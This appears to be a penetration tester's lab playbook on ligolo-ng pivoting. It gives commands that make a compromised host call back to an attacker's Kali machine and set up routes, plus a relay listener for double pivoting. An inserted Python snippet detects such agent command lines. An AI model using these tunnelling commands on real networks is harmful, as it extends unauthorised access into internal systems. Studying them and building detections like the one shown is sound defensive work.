Jackmeister's Playbook
Port Forwarding

Ligolo

Starting listener server

./proxy -laddr 192.168.146.158:5555 -selfcert

Connecting from victim back to kali

./agent -connect 192.168.45.223:11601 -ignore-cert

Creating a new interface

sudo ip tuntap add user $(whoami) mode tun ligolo2 ; sudo ip link set ligolo2 up

# Adding routes
sudo ip r add 10.4.216.0/24 dev ligolo2

Connecting to newly added connection

ligolo-ng » session
? Specify a session : 1 - #1 - CRAFT2\apache@CRAFT2 - 192.168.230.188:49785
[Agent : CRAFT2\apache@CRAFT2] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0 2                    │
│ Hardware MAC │ 00:50:56:ab:d7:a7              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.230.188/24             │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 1                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘
[Agent : CRAFT2\apache@CRAFT2] » start --tun craft2-pv
[Agent : CRAFT2\apache@CRAFT2] » INFO[0307] Starting tunnel to CRAFT2\apache@CRAFT2

Connecting to victim local server port

sudo ip tuntap add user $(whoami) mode tun craft2-pv ; sudo ip link set craft2-pv up
sudo ip r add 240.0.0.1/32 dev craft2-pv

Connecting to multiple internal networks

[Agent : confluence@confluence01] » listener_add --addr 0.0.0.0:8888 --to 192.168.45.223:8080 --tcp

Anything that connects to port 8080 on the victim will connect back to us on port 8888.

  • The first victim listens on port 8888

  • It redirects all received traffic to the kali server on port 8080

  • The second victim connects to the first victim on port 8888

  • The traffic is redirected back to the kali server

agent.exe -connect 192.168.26.131:8888 -ignore-cert
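
Seen from the monitored side, the agent command lines on this page share one argument shape: a `-connect host:port` target together with `-ignore-cert`. The following is an added example, not part of the original playbook or of ligolo-ng, that scans constructed process-creation events for that shape and marks callbacks that terminate on another monitored host, as in the relay setup above. The host inventory, the host names FILES01 and WEB01, and the renamed `svc.exe` are assumptions.

```python
import shlex

# Constructed inventory of monitored hosts (name -> IP); an assumption for this example.
MONITORED = {"CRAFT2": "192.168.230.188", "confluence01": "192.168.26.131"}

# Constructed process-creation events (host, command line). The two agent
# command lines are the ones shown on this page; the rest are made up.
EVENTS = [
    ("CRAFT2", "./agent -connect 192.168.45.223:11601 -ignore-cert"),
    ("FILES01", "agent.exe -connect 192.168.26.131:8888 -ignore-cert"),
    ("FILES01", "svc.exe --ignore-cert --connect=192.168.26.131:8888"),
    ("WEB01", "openssl s_client -connect 192.168.26.131:443"),
    ("WEB01", "curl -k https://192.168.26.131:8443/health"),
]

def flags(cmdline):
    """Map Go-style flags (-f, --f, -f v, -f=v) to their values ('' if none)."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    out = {}
    for i, arg in enumerate(argv):
        if not arg.startswith("-"):
            continue
        name, _, value = arg.lstrip("-").partition("=")
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        out[name] = value or ("" if nxt.startswith("-") else nxt)
    return out

def detect(host, cmdline):
    """Return a finding for a tunnel-agent style command line, else None."""
    f = flags(cmdline)
    dst, _, port = f.get("connect", "").rpartition(":")
    # -connect alone also matches 'openssl s_client'; require -ignore-cert too.
    if "ignore-cert" not in f or not dst or not port.isdigit():
        return None
    # A callback that lands on a monitored host points at a relay listener there.
    relay = next((n for n, ip in MONITORED.items() if ip == dst), None)
    kind = "relay-via-internal-host" if relay else "direct-callback"
    return {"host": host, "dst": dst, "port": int(port), "kind": kind, "relay": relay}

def scan(events):
    """Run detect() over all events and keep only the findings."""
    return [r for r in (detect(h, c) for h, c in events) if r]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

Matching on the flag pair rather than the binary name is what lets the renamed `svc.exe` event surface, while the `openssl` and `curl` lines stay quiet.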
https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b
https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel